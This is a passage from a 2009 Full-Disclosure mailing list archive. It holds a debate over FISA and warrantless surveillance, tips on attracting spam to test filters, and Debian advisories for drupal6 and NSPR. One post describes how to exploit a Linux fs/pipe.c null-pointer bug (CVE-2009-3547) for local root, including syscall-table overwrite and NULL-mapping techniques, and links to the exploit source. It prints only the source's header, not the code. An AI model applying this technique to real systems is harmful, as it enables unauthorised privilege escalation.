> communications are being intercepted "speaks" to someone (email, im,
> twitter, blog, forum, whatever) and tells them to contact a third party to
> conduct an operation, the NSA would want to intercept the third party's
> communications as well.  Under existing law (if you believe that FISA
> applies) they would have 72 hours maximum to submit the necessary
> paperwork and obtain the necessary approvals to go before the FISA court
> and obtain a warrant.  Otherwise they would have to cease all
> surveillance.  Meanwhile the terrorists aren't going to sit around waiting
> for the warrant to be issued to continue their plans.
>
> > It seems to me that it is already far too easy for our national security
> > apparatus to spy on us without our permission or knowledge. The last
> > thing I want is to make such spying even easier for them.
> >
>
> They're not spying on us.  Intelligence agencies don't spy on us.  Law
> enforcement does.
>
> I was involved in (signals) intelligence years ago.  I can assure you we
> could have cared less what US citizens were doing *unless* what they were
> doing involved working for a foreign power to steal secrets or undermine
> the US government or similar spy type activities.  Sure we could "see"
> what everybody was doing.  But we only cared about the enemies of our
> country (at that time the Russians and others).  IOW, we were "looking"
> away from the US.  If you came into our view it was because you were doing
> something suspicious in the context of foreign power surveillance.
>
> Personally I believe the President has inherent Constitutional powers that
> authorize him to do what President Bush did (and many others before him
> have done) and what President Obama is probably doing now.  The courts,
> although they have never directly addressed the issue, appear to agree.
> In a case in 2002, the United States Foreign Intelligence Surveillance
> Court of Review wrote, in part, "Even without taking into account the
> President?s inherent constitutional authority to conduct warrantless
> foreign intelligence surveillance", which is an admission of the
> President's power to surveil the enemies of this country without having to
> jump through legal hoops to do so.
>
> It would be quite interesting to have the FISA law be considered by the
> Supreme Court to determine if it really is a constitutional law.  I doubt
> that will ever happen, because, despite all the political rhetoric, no one
> really wants to go there.  They'd rather pontificate about it and try to
> score political points with it.
>
> Paul Schmehl, If it isn't already
> obvious, my opinions are my own
> and not those of my employer.
> ******************************************
> WARNING: Check the headers before replying
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091107/6b6ec3ac/attachment.html 

From Valdis.Kletnieks at vt.edu  Sat Nov  7 17:24:55 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sat, 07 Nov 2009 12:24:55 -0500
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: Your message of "Fri, 06 Nov 2009 23:42:45 CST."
	<C2C452B5BDA47BF2E7304902@Macintosh-2.local>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>
	<5915.1257525999@turing-police.cc.vt.edu>
	<A19D5AF8D15E125558BA99A7@utd65257.utdallas.edu>
	<6a5e46470911061607q6e315983leba1e66084908170@mail.gmail.com>
	<C6C79A0AF76811AA34B3BD13@Macintosh-2.local>
	<6a5e46470911062010y5400c465i2408c1ba6c3ef9d7@mail.gmail.com>
	<C2C452B5BDA47BF2E7304902@Macintosh-2.local>
Message-ID: <48833.1257614695@turing-police.cc.vt.edu>

On Fri, 06 Nov 2009 23:42:45 CST, Paul Schmehl said:
> communications as well.  Under existing law (if you believe that FISA 
> applies) they would have 72 hours maximum to submit the necessary 
> paperwork and obtain the necessary approvals to go before the FISA court 
> and obtain a warrant.  Otherwise they would have to cease all 
> surveillance.  Meanwhile the terrorists aren't going to sit around waiting 
> for the warrant to be issued to continue their plans.

Actually Paul, you have that bass-ackwards, and it's important.

They are allowed to start wiretapping immediately, and then have 72 hours
*after they already started listening* to find a FISA court judge and
do the paperwork.  So yes, the terrorists don't wait for a warrant, and
the NSA doesn't need to wait either.

So let's see.. You're the NSA. You develop a person of interest.  You start
wiretapping the crap out of this guy.  You now have 72 hours to call the FISA
judge you almost certainly have on speed-dial. The request will almost
certainly be granted (one source list 18,761 FISA warrants requested from 1978
up to the end of 2004, of which *4* were rejected - but then granted after
modification).

But even *that* is apparently too onerous.  The only reasonable conclusion is
that you wanted to wiretap people that even the fairly lenient FISA rules
wouldn't get you a warrant. And that's important, because the entire reason the
FISA court was created in 1978 in the *first* place was because Nixon got
caught using government agencies to illegally spy on political enemies and
activists.




-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 227 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091107/216f3553/attachment.bin 

From pschmehl_lists at tx.rr.com  Sat Nov  7 19:31:57 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Sat, 07 Nov 2009 13:31:57 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <6a5e46470911070920r6a58aea1of44b263838a04e43@mail.gmail.com>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>	
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>	
	<5915.1257525999@turing-police.cc.vt.edu>	
	<A19D5AF8D15E125558BA99A7@utd65257.utdallas.edu>	
	<6a5e46470911061607q6e315983leba1e66084908170@mail.gmail.com>	
	<C6C79A0AF76811AA34B3BD13@Macintosh-2.local>	
	<6a5e46470911062010y5400c465i2408c1ba6c3ef9d7@mail.gmail.com>	
	<C2C452B5BDA47BF2E7304902@Macintosh-2.local>
	<6a5e46470911070920r6a58aea1of44b263838a04e43@mail.gmail.com>
Message-ID: <894969E5805E00D7AAFCF8F1@Macintosh-2.local>

--On November 7, 2009 11:20:31 AM -0600 Rohit Patnaik 
<quanticle at gmail.com> wrote:

> The direction of the association doesn't matter. It doesn't matter if
> the "terrorist" is contacting me, or if I'm contacting the terrorist.?
> In either case, the US government should get a warrant before they spy
> on me.

Why?  If they were pursuing criminal charges against you, then, by all 
means, they should have to comply with all the strictures that protect our 
rights.  But to gather intelligence about what terrorists are up to, even 
if a US citizen is involved, should not require a warrant.

Intelligence works best in a world of secrecy.  The more people that are 
aware of what's going on, the higher the likelihood is that the persons 
being monitored will find out and change their operations.

The problem is that the lines have blurred because of technological 
advances.  So you have the dichotomy of the need to know what the enemy is 
up to juxtaposed against the need to protect citizens from an out of 
control government.  I believe the line should be drawn clearly between 
information gathering and pursuit of criminal charges.  Other believe 
differently.

>?Also, this executive opinion doesn't just apply to the CIA and
> the NSA.? It applies to the entire executive branch, including law
> enforcement.
>

Huh?  How do you know that?  Have you seen the Executive Order?  I've 
looked for it in the Presidential Archives.  It's not there.

> Secondly, we seem to have a general disagreement about the intent of the
> laws regulating the intelligence and law enforcement apparatus of the
> state.? My opinion is that the restrictions placed on these agencies
> were intentional.? They were created by a Congress that was disgusted
> by the rampant abuse of executive power that occurred during the Nixon
> administration.

That is correct.  The Nixon administration was using the excuse of 
national security to spy on domestic activists, claiming they were a 
threat to national security.  FISA was created to insert the courts into 
the process and prevent spying on US citizens without a warrant.  But even 
when FISA was created, Congress noted that the law was not designed to 
infringe on the President's Constitutional powers to conduct foreign agent 
surveillance without a warrant.

> They were strengthened when Reagan found loopholes in
> those restrictions.? As such, I don't think its Constitutionally valid
> for the President to unilaterally ignore those restrictions.? Yes, I'm
> aware of the use of force resolution that was passed shortly following
> the Sept. 11th attack.? However, I don't think the language contained
> therein represented a rollback of over 30 years of legislative
> history.? If it is really necessary for the intelligence agencies to
> have these unprecedented powers, then they shouldn't be hesitant in
> presenting their case before Congress.
>

There are two schools of thought.  One says the Executive should ask 
Congress to change the laws to make the job easier to do.  The other says 
the Executive's inherent powers make that unnecessary.  FISA, if 
interpreted to require warrants for all surveillance of US citizens, even 
traitors working for the enemy, may well be an unconstitutional intrusion 
on the Executive branch's powers.  If challenged in court, it might even 
be struck down as overly broad.  Or the courts could clarify exactly where 
the line is drawn.

I don't think the program "rolled back 30 years of legislation" as some 
have argued.  I think it chose to interpret the Executive's powers as 
including the ability to monitor communications of the enemy, even when 
those communications crossed our borders, without having to engage the 
ponderous legal system and all the reams of paperwork that requires.  FISA 
was designed before the age of transcontinental computer transmissions and 
never envisioned a scenario where the enemy's communications would be 
carried on circuits within the US.  In fact FISA didn't even address 
individual actors but only nation states.

The issues are complex, and they should be discussed without emotion or 
political rhetoric and unfounded charges that cloud the waters.  And one 
must always keep in mind that we're talking about a military agency trying 
to track what our enemies are doing, not a domestic law enforcement agency 
trying to convict citizens of a crime.

Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
******************************************
WARNING: Check the headers before replying


From pschmehl_lists at tx.rr.com  Sat Nov  7 19:51:29 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Sat, 07 Nov 2009 13:51:29 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <48833.1257614695@turing-police.cc.vt.edu>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>
	<5915.1257525999@turing-police.cc.vt.edu>
	<A19D5AF8D15E125558BA99A7@utd65257.utdallas.edu>
	<6a5e46470911061607q6e315983leba1e66084908170@mail.gmail.com>
	<C6C79A0AF76811AA34B3BD13@Macintosh-2.local>
	<6a5e46470911062010y5400c465i2408c1ba6c3ef9d7@mail.gmail.com> 
	<C2C452B5BDA47BF2E7304902@Macintosh-2.local>
	<48833.1257614695@turing-police.cc.vt.edu>
Message-ID: <414B34A1993B5B0F752990D0@Macintosh-2.local>

--On November 7, 2009 11:24:55 AM -0600 Valdis.Kletnieks at vt.edu wrote:

> On Fri, 06 Nov 2009 23:42:45 CST, Paul Schmehl said:
>> communications as well.  Under existing law (if you believe that FISA
>> applies) they would have 72 hours maximum to submit the necessary
>> paperwork and obtain the necessary approvals to go before the FISA
>> court  and obtain a warrant.  Otherwise they would have to cease all
>> surveillance.  Meanwhile the terrorists aren't going to sit around
>> waiting  for the warrant to be issued to continue their plans.
>
> Actually Paul, you have that bass-ackwards, and it's important.
>

No, actually I don't.  I just did a lousy job of wording it.

> They are allowed to start wiretapping immediately, and then have 72 hours
> *after they already started listening* to find a FISA court judge and
> do the paperwork.  So yes, the terrorists don't wait for a warrant, and
> the NSA doesn't need to wait either.
>

That's only true if they can get the paperwork done and obtain the warrant 
within 72 hours.  Otherwise, at the 72 hour mark all monitoring must 
cease.  And guess who knows that?  We don't exactly keep our operational 
strictures secret, you know.  And to think that terrorists aren't aware of 
the rules within which we operate is to display profound ignorance.  They 
have taken clear advantage of our restrictive Rules of Engagement in Iraq 
and Afghanistan to inflict more casualties on us than we might otherwise 
have suffered.

> So let's see.. You're the NSA. You develop a person of interest.  You
> start wiretapping the crap out of this guy.  You now have 72 hours to
> call the FISA judge you almost certainly have on speed-dial. The request
> will almost certainly be granted (one source list 18,761 FISA warrants
> requested from 1978 up to the end of 2004, of which *4* were rejected -
> but then granted after modification).
>

>From what I've read getting a warrant in 72 hours is almost impossible. 
Remember they first have to gather sufficient data to convince a judge 
that they have sufficient probable cause to conduct the surveillance.  And 
they have to do that separately for every device the terrorist might use. 
(That's been changed now, but even that some of the privacy advocates are 
opposed to.)  Then they have to put a legal brief together, obtain the 
Attorney General's approval and signature and then contact the court for 
the warrant.  Then the court needs to read the brief, and if the judge has 
questions, they must obtain the answers to those before they can get the 
warrant.

It's not quite the same as dropping by Human Resources to pick up a copy 
of your Benefits Handbook, as you imply.

> But even *that* is apparently too onerous.  The only reasonable
> conclusion is that you wanted to wiretap people that even the fairly
> lenient FISA rules wouldn't get you a warrant. And that's important,
> because the entire reason the FISA court was created in 1978 in the
> *first* place was because Nixon got caught using government agencies to
> illegally spy on political enemies and activists.
>

Yes - political enemies and activists - not terrorists.

It seems particularly peculiar to me that people get all hot and bothered 
about this issue given that a plausible scenario has a terrorist in 
Pakistan contacting a party in the United States (sleeper cell?  lone 
actor?) who may or may not be a US person, and that the intent of the 
monitoring is to find out what they're doing or planning to do so that we 
can prevent terrorist acts, not to convict US persons of a crime.

As I've pointed out now several times, it's analogous to people that get 
all hot and bothered by the fact that admins have access to the data on 
their computers.  You, of all people, know what a bogus concern that is. 
Admins could care less about the data on your computer, much less have the 
time to go rummaging around through all that data looking for something 
interesting.  They just wish you quit getting your computer infected all 
the time.

Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
******************************************
WARNING: Check the headers before replying


From teach at vxhell.org  Sat Nov  7 19:37:13 2009
From: teach at vxhell.org (Edward D. Teach)
Date: Sat, 07 Nov 2009 20:37:13 +0100
Subject: [Full-disclosure] Linux 2.6.x fs/pipe.c local root exploit
	(CVE-2009-3547)
Message-ID: <1257622633.29136.0.camel@apophis>

For those who were not yet aware, there is at least 3 public exploits
since 11/05/2009 for CVE-2009-3547 targeting *all* linux kernels from
2.6.0 to 2.6.31 included. Since spender and fotis have already release
their own, there is not need for us to keep this on our hd. 
ImpelDown.c is a poc trying to exploit null ptr dereference in fs/pipe.c
for *all* linux kernel from 2.6.0 to 2.6.31 and ImpelDown-2.6.31only.c
target only linux kernel version 2.6.31 (tested and approuved with
mmap_min_addr at 0).
If you were writing your own, you have already noticed that there is a
subtle difference in the way you can own kernels 2.6.0 up to 2.6.10 and
kernels 2.6.11 up to 2.6.31: in the first one the null ptr deref leads
to an arbitrary write to everywhere in the kernel since you have control
over the destination address of 

linux2.6.9/fs/pipe.c

...
219                        if (pipe_iov_copy_from_user(pipebuf, iov, chars)) {
...
In such case, we try to exploit this by overwriting and old and obsolete 
syscall address in the sys_call_table by our privilege escalator function 
address (hehe old school trickz are always the best).

In kernels 2.6.11 up to 2.6.31, exploitation simply resume in mapping the correct 
struct pipe_inode_info at NULL and the kernel will call a fptr under our control
at inode->i_pipe->bufs[1-16].ops->something()

You can find exploits at
http://www.vxhell.org/~teach/exploits/ImpelDown.c
and
http://www.vxhell.org/~teach/exploits/ImpelDown-2.6.31only.c
The first one wasn't tested but the second would work for the given kernel 
(according to your mmap_min_addr)

We highly recommand to apply grsecurity patch ([1]) since UDEREF will preserve
you from all this bug class, 
or at least have a kernel which correctly implement mmap_min_addr, but 
Julien and Tavis [2] have already showed you how this can be easily bypassed.
Regards

[1] http://grsecurity.net 
[2] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html


teach at blackpearl$ head -n 18 exploits/ImpelDown-2.6.31only.c 
/******************************************************************************
 *                            .:: Impel Down ::.
 *
 *     Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86)
 *                              by teach & xipe
 *    Greetz goes to all our mates from #nibbles, #oldschool and
#carib0u
 *    (hehe guyz, we would probably be high profile and mediatised el8
if we 
 *    lost less time on trolling all day long, but we LOVE IT :))) 
 *    Special thanks to Ivanlef0u, j0rn & pouik for being such amazing
(but i
 *    promise ivan, one day i'll kill u :p)
 *                
 * (C) COPYRIGHT teach & xipe, 2009
 * All Rights Reserved
 *
 * teach at vxhell.org
 * xipe at vxhell.org
 *    

*******************************************************************************/



From white at debian.org  Sat Nov  7 00:46:57 2009
From: white at debian.org (Steffen Joeris)
Date: Sat,  7 Nov 2009 11:46:57 +1100 (EST)
Subject: [Full-disclosure] [SECURITY] [DSA 1930-1] New drupal6 packages fix
	several vulnerabilities
Message-ID: <20091107004657.21CD3848A37@hannah.localdomain>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1930-1                  security at debian.org
http://www.debian.org/security/                      Steffen Joeris
November 07, 2009                   http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : drupal6                           
Vulnerability  : several vulnerabilities           
Problem type   : remote                            
Debian-specific: no                                
CVE IDs        : CVE-2009-2372 CVE-2009-2373 CVE-2009-2374
Debian Bug     : 535435 547140                            


Several vulnerabilities have been found in drupal6, a fully-featured
content management framework. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2009-2372

Gerhard Killesreiter discovered a flaw in the way user signatures are
handled. It is possible for a user to inject arbitrary code via a
crafted user signature. (SA-CORE-2009-007)

CVE-2009-2373

Mark Piper, Sven Herrmann and Brandon Knight discovered a cross-site
scripting issue in the forum module, which could be exploited via the
tid parameter. (SA-CORE-2009-007)

CVE-2009-2374

Sumit Datta discovered that certain drupal6 pages leak sensible
information such as user credentials. (SA-CORE-2009-007)


Several design flaws in the OpenID module have been fixed, which could
lead to cross-site request forgeries or privilege escalations. Also, the
file upload function does not process all extensions properly leading
to the possible execution of arbitrary code.
(SA-CORE-2009-008)


For the stable distribution (lenny), these problems have been fixed in
version 6.6-3lenny3.

The oldstable distribution (etch) does not contain drupal6.

For the testing distribution (squeeze) and the unstable distribution
(sid), these problems have been fixed in version 6.14-1.


We recommend that you upgrade your drupal6 packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny3.dsc
    Size/MD5 checksum:     1130 489d56336053311b1ee24aaf17f41ffb
  http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny3.diff.gz
    Size/MD5 checksum:    24870 d70dfad8a6f211cb9dd62e071e5ddfd9
  http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6.orig.tar.gz
    Size/MD5 checksum:  1071507 caaa55d1990b34dee48f5047ce98e2bb

Architecture independent packages:

  http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny3_all.deb
    Size/MD5 checksum:  1088258 6162b6933d636065c6a07e6f6199c7df


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAkr0wzIACgkQ62zWxYk/rQegCACfaCVMO8lrhfH/57iPLCgFOkp5
5ykAnifSZR4vet+YNDY3Z6vOiTSgUe/0
=o5XE
-----END PGP SIGNATURE-----


From mikelitoris at hushmail.com  Sat Nov  7 22:06:42 2009
From: mikelitoris at hushmail.com (mikelitoris at hushmail.com)
Date: Sat, 07 Nov 2009 14:06:42 -0800
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
Message-ID: <20091107220642.2615411803D@smtp.hushmail.com>

> But to gather intelligence about what terrorists are up to, even 
if a US citizen is involved, should not require a warrant.

This is all well and good, until the definition of terrorist is 
changed and you become labeled a "terrorist" because your "reason" 
is suddenly counterproductive to someone else's "opinion".  You 
must apply the warrant requirement consistently.  Otherwise, when 
interpretation of the word "terrorist" changes, it affects the 
meaning of the law.  And call me crazy, but I'm just not willing to 
assume that someone won't abuse the power of being able to surveil 
US citizens and do exactly what Nixon did, spy on their 
competition/detractors.  Surely you can admit that some people do 
things that they wouldn't normally do when big money and big power 
are involved.  After all, "Those who cannot learn from history are 
doomed to repeat it."  Don't be so naive to think it can't happen 
again.

> Intelligence works best in a world of secrecy.

So does deception.  Significantly more so, in fact.

> As I've pointed out now several times, it's analogous to people 
that get all hot and bothered by the fact that admins have access 
to the data on their computers.

Yes, but that computer probably doesn't belong to me but instead to 
my employer.  If it belongs to me, you better have a policy that 
prevents me from using it at work, and/or a login disclaimer 
informing me of your right to monitor what I do if I connect to 
your network.  If not, you better damn well have a warrant if you 
want to take a look at my property.  And as far as I know, there's 
no login disclaimer on the interwebs that allows the government to 
monitor what I do on that network, nor on the telephone, or my 
mobile phone contract.

> From what I've read getting a warrant in 72 hours is almost 
impossible.

Ahah!  Now we're on to something.  Here's an idea.  Make it easier 
to get that warrant when you need it.  Improve the process, so that 
when requested, a warrant can be turned around in hours, not days.  
Don't remove the requirement altogether.  That's simply inviting 
trouble.



From yirimyah at gmail.com  Sat Nov  7 22:05:40 2009
From: yirimyah at gmail.com (dramacrat)
Date: Sun, 8 Nov 2009 09:05:40 +1100
Subject: [Full-disclosure] How to receive SPAM mail
In-Reply-To: <4AF4994D.1080006@csuohio.edu>
References: <4AF474CF.60701@ec-penflue.net> <4AF4994D.1080006@csuohio.edu>
Message-ID: <7271864a0911071405s7a6f5af7m9850b7dc078cb868@mail.gmail.com>

If you want to be spammed, join full-disclosure.

2009/11/7 Michael Holstein <michael.holstein at csuohio.edu>

>
> > I have a SPAM filter and virus firewall testing.
> > So, I want to get the real SPAM is sent to a specific email address.
> > What better way is there anything?
> >
>
> I had to do a similar thing when doing a spam-appliance "vendor
> shakedown" .. what I did was setup a subdomain
>
> eg: test.mycompany.com
>
> and then create email IDs within that subdomain that had valid mailboxes
>
> eg: bob at test.mycompany.com, suzie at test.mycompany.com, etc.
>
> and then I used Google to search for "free offers" and "work from home",
> etc. and entered those IDs on about 100 different sites. There's tons of
> sites out there that you can sign-up for "hundreds of free offers" and
> whatnot.
>
> Within days I was getting hundreds of messages per day for each ID.
>
> Note .. they have to be valid mailboxes because you frequently need to
> reply to the "activation" email to make them work. You could setup a
> little script to wget any links in emails received and do "-O /dev/null"
> with the results .. but I just had all the accounts configured on a test
> machine in thunderbird so I could view what came through and the
> resulting "junk summary" emails.
>
> The advantage of doing it as a subdomain (or just register another test
> domain) is that you can make the traffic go away entirely by deleting
> the DNS record.
>
> Regards,
>
> Michael Holstein
> Cleveland State University
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091108/5afd535e/attachment.html 

From jmm at debian.org  Sun Nov  8 10:07:37 2009
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Sun, 8 Nov 2009 11:07:37 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1931-1] New NSPR packages fix
	several vulnerabilities
Message-ID: <20091108100737.GA4532@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1931-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
November 08, 2009                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : nspr
Vulnerability  : several
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)      : CVE-2009-1563 CVE-2009-2463

Several vulnerabilities have been discovered in the NetScape Portable
Runtime Library, which may lead to the execution of arbitrary code. The 
Common Vulnerabilities and Exposures project identifies the following 
problems:

CVE-2009-1563

    A programming error in the string handling code may lead to the
    execution of arbitrary code.

CVE-2009-2463

    An integer overflow in the Base64 decoding functions may lead to
    the execution of arbitrary code.

The old stable distribution (etch) doesn't contain nspr.

For the stable distribution (lenny), these problems have been fixed in
version 4.7.1-5.

For the unstable distribution (sid) these problems have been fixed in
version 4.8.2-1.

We recommend that you upgrade your NSPR packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/n/nspr/nspr_4.7.1.orig.tar.gz
    Size/MD5 checksum:  1258177 55c62ede0e510c6df9bfcc8ac9cffd0c
  http://security.debian.org/pool/updates/main/n/nspr/nspr_4.7.1-5.dsc
    Size/MD5 checksum:     1133 a0ba001408f4751f3c80f02334e188b1
  http://security.debian.org/pool/updates/main/n/nspr/nspr_4.7.1-5.diff.gz
    Size/MD5 checksum:    28285 a3240caf8899d497312ae5f915dd353d

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_alpha.deb
    Size/MD5 checksum:   145524 a953d83466dc08e5c64f3fac93dcc8c6
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_alpha.deb
    Size/MD5 checksum:   284688 29fdeff7a43ac466efd2ddec8497dcde
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_alpha.deb
    Size/MD5 checksum:   313328 60eff12d86eef930d01b16ca9bcee432

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_amd64.deb
    Size/MD5 checksum:   134452 e8362f7bfb9ad25178fc3b58c8888794
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_amd64.deb
    Size/MD5 checksum:   290938 1bda17f94f3e960dcdad04772329ad14
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_amd64.deb
    Size/MD5 checksum:   271976 fa0750a3a8762075901a8f06fbf21495

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_arm.deb
    Size/MD5 checksum:   276952 6a072a062f7e9c2db1b43338a3955bdc
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_arm.deb
    Size/MD5 checksum:   119436 89f1a236d10d78229627fd762bc67a3e
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_arm.deb
    Size/MD5 checksum:   255602 9da2dc9c312cf7901f7aeb1f710e507f

armel architecture (ARM EABI)

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_armel.deb
    Size/MD5 checksum:   120734 b71745bf5877be82a349885592037d78
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_armel.deb
    Size/MD5 checksum:   282114 cc3def69b457c54f2e13bd6c57090477
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_armel.deb
    Size/MD5 checksum:   258072 62328078c188bc87f5039c2e5a9b5674

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_hppa.deb
    Size/MD5 checksum:   141442 eec30b4a587f8f93eda26b9376bb34e3
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_hppa.deb
    Size/MD5 checksum:   285916 43fac9fb0eaa79036d9b302db5521781
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_hppa.deb
    Size/MD5 checksum:   279668 db56b3a1adbdedc308936e6ef50f5260

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_i386.deb
    Size/MD5 checksum:   259796 f36c9a52738ee56aedd05e18461e0c1f
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_i386.deb
    Size/MD5 checksum:   124188 adff22c50d9a64ed8bf7b6e2c2edc992
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_i386.deb
    Size/MD5 checksum:   281648 9896df215653b33de9ce1f8529c1daea

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_ia64.deb
    Size/MD5 checksum:   331678 5055f6bcbcbb72a48b9c15f21149fee9
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_ia64.deb
    Size/MD5 checksum:   271188 3e12dcca1457d95601c2d4991e9981f9
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_ia64.deb
    Size/MD5 checksum:   184152 3575ec187b5219f9c71c6eee5a5474a0

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_mips.deb
    Size/MD5 checksum:   296890 5f45b168d496b884c79bfb5c46462d5f
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_mips.deb
    Size/MD5 checksum:   279162 0b5e93aabae4bfc387c7093153abbec2
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_mips.deb
    Size/MD5 checksum:   126054 5e484999ac3044b87656dd46115f63a1

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_mipsel.deb
    Size/MD5 checksum:   291178 fd5a7aded6225e30eedf987f44a16fea
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_mipsel.deb
    Size/MD5 checksum:   277004 a4f26928866934db999796be4012a7a2
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_mipsel.deb
    Size/MD5 checksum:   125256 71836594904db6f154ac3eb89cbbfddb

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_powerpc.deb
    Size/MD5 checksum:   268738 5daed1f2d5921e736c7f15d6727b8959
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d_4.7.1-5_powerpc.deb
    Size/MD5 checksum:   139154 34b602d43792afbf7f2ccde07d0687bf
  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-0d-dbg_4.7.1-5_powerpc.deb
    Size/MD5 checksum:   292090 e6a310b883c7aa5b6f72bf0cc0683305

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/n/nspr/libnspr4-dev_4.7.1-5_s390.deb
